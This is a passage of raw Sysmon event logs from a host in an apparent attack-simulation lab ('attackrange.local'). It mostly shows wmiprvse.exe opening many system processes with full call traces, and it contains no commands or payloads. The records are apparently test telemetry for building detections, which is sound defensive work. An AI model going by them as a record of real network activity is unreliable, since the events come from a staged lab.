ll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204204Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.947{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-E9C3-6040-534E-00000000AD01}7164C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204203Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.947{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D502-6040-CE4B-00000000AD01}1376C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204202Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.947{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204201Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.947{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D4F2-603F-B82D-00000000AD01}5444C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204200Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.947{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D4F2-603F-B72D-00000000AD01}5372c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204199Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.947{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D4F2-603F-B62D-00000000AD01}6644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002204198Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.947{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3637F772A74DE042AF73495A6BEDAB1E,SHA256=F0A6AD6D1C16F2C4034D1934A2559E80A367A6EF04BDD57CA38FBB1AF014C29D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002204197Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.947{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D4F0-603F-B52D-00000000AD01}4336C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204196Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.947{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D4F0-603F-B42D-00000000AD01}2724C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204195Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.931{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-ADE1-603E-4F0A-00000000AD01}7004C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204194Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.931{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-9B0C-603E-D607-00000000AD01}6796C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204193Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.931{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-9A00-603E-9E07-00000000AD01}4168C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204192Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.931{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204191Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.931{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204190Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.931{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99F4-603E-8607-00000000AD01}4560C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204189Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.931{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99F4-603E-8307-00000000AD01}1624C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204188Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.931{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99F2-603E-7D07-00000000AD01}636C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204187Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.931{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99F1-603E-7A07-00000000AD01}2736C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204186Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.931{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-84BD-603E-DF00-00000000AD01}4964C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204185Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.931{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-84AF-603E-DC00-00000000AD01}3964C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204184Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.931{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program 